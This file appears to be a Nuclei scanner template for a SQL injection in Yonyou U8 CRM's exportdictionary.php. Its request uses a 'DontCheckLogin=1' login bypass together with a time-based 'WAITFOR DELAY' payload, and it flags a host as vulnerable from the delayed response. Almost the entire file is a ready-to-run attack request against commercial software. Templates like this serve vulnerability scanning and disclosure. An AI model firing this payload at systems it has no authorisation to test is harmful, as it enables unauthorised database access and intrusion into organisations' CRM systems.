id: yonyou-u8-crm-exportdictionary-sqli
info:
  name: 用友 U8 CRM exportdictionary.php - sqli
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8-CRM%E6%8E%A5%E5%8F%A3exportdictionary.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
  tags: 2024,sqli,u8crm,yonyou,oa,time

http:
  - raw:  
      - |
        @timeout: 15s
        GET /devtools/tools/exportdictionary.php?DontCheckLogin=1&value=1%27;WAITFOR+DELAY+%270:0:6%27-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
        X-Requested-With: XMLHttpRequest
        Accept: */*
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: PHPSESSID=bgsesstimeout-; TL_EXPANDED=REL_STAGE2012

    matchers:
      - type: dsl
        dsl:
          - contains_all(body,'dd_str_resource')
          - status_code == 200
          - duration >= 5 && duration < 9
        condition: and